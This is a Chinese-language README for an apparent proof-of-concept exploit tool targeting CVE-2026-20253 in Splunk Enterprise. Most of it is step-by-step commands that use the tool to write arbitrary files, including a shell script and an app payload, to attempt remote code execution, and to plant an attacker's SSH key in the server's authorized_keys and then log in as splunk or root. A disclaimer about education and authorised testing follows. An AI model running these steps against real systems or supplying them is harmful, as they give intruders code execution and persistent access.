HORKimhab/CVE-2026-20253

# CVE-2026-20253 - Splunk Enterprise ## ⚡ 简易用法 仅在安全和已授权的环境中使用此项目，例如： - 本地虚拟机 - Docker 容器 - 隔离的实验室环境 - 授权的渗透测试环境 示例设置： ``` git clone https://github.com/HORKimhab/CVE-2026-20253 cd CVE-2026-20253 # 项目使用 python 遵循以下步骤 # 创建虚拟环境 python -m venv venv # 激活虚拟环境 # macOS / Linux source venv/bin/activate # Windows (Git Bash / WSL) source venv/Scripts/activate # 安装 requirements pip install -r requirements.txt ``` 示例用法： ``` # 基本检查 python3 cve-2026-20253.py -t http://target:8000 --check # 写入空/截断文件 python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned" # 写入文件内容 python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt # 高级（恢复 + 内容） python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore # 尝试 RCE python3 cve-2026-20253.py -t http://target:8000 --rce python3 cve-2026-20253_poc.py -t http://target:8000 \ --write "/path/to/target/file.py" \ --content poc-content.txt --restore # SSH # 生成 SSH 密钥对（如果没有的话） ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N "" # 或者如果目标较旧则使用 RSA # ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N "" cat ~/.ssh/splunk_poc_key.pub > poc-content.txt python3 cve-2026-20253_poc.py -t http://target:8000 \ --write "/home/splunk/.ssh/authorized_keys" \ --content poc-content.txt \ --restore python3 cve-2026-20253_poc.py -t http://target:8000 \ --write "/home/splunk/.ssh/authorized_keys" \ --content poc-content.txt # 确保你这边的权限正确 chmod 600 ~/.ssh/splunk_poc_key # 连接 ssh -i ~/.ssh/splunk_poc_key splunk@target_ip # 或者作为 root ssh -i ~/.ssh/splunk_poc_key root@target_ip # 步骤 1：创建目录（可能并不总是有效） python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder" # 步骤 2：写入 authorized_keys python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt mkdir -p /home/splunk/.ssh chmod 700 /home/splunk/.ssh chmod 600 /home/splunk/.ssh/authorized_keys chown -R splunk:splunk /home/splunk/.ssh ``` ## 致谢与参考 - https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html - watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253 - CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253 # 📚 教育性安全研究仓库 一个用于在受控环境中学习、测试和研究网络安全概念的仓库。 ## ⚠️ 安全与法律免责声明 ## 目的 本仓库仅用于**教育和已授权的安全研究**。 旨在帮助用户了解： - 安全漏洞 - 沙盒与隔离概念 - 安全编码与防御实践 ## 仅限授权使用 仅在您已获得权限的环境中使用此仓库，例如： - 个人实验室或虚拟机 - Docker 或隔离环境 - 授权的渗透测试 - 网络安全培训或学术研究 严禁未经授权或非法使用。 ## 免责声明 作者及贡献者对本项目造成的任何损害、滥用、法律问题或损失**概不负责**。 使用本仓库即表示您同意： - 您需对自己的行为负责 - 您将合法且符合道德地使用它 - 本项目按“原样”提供，**不提供任何担保** ## 道德使用 本项目适用于： - 防御性安全研究 - 网络安全教育 - 漏洞意识培养 - 安全系统与软件研究 请遵循负责任的披露原则，并遵守所有适用法律。 ## 联系方式 如需进行负责任的披露或合作，请通过 GitHub 联系仓库维护者。

标签：CISA项目, GhostArchive, PoC, Python, 任意文件写入, 内存分配, 无后门, 暴力破解, 编程工具, 网络信息收集, 远程代码执行, 逆向工具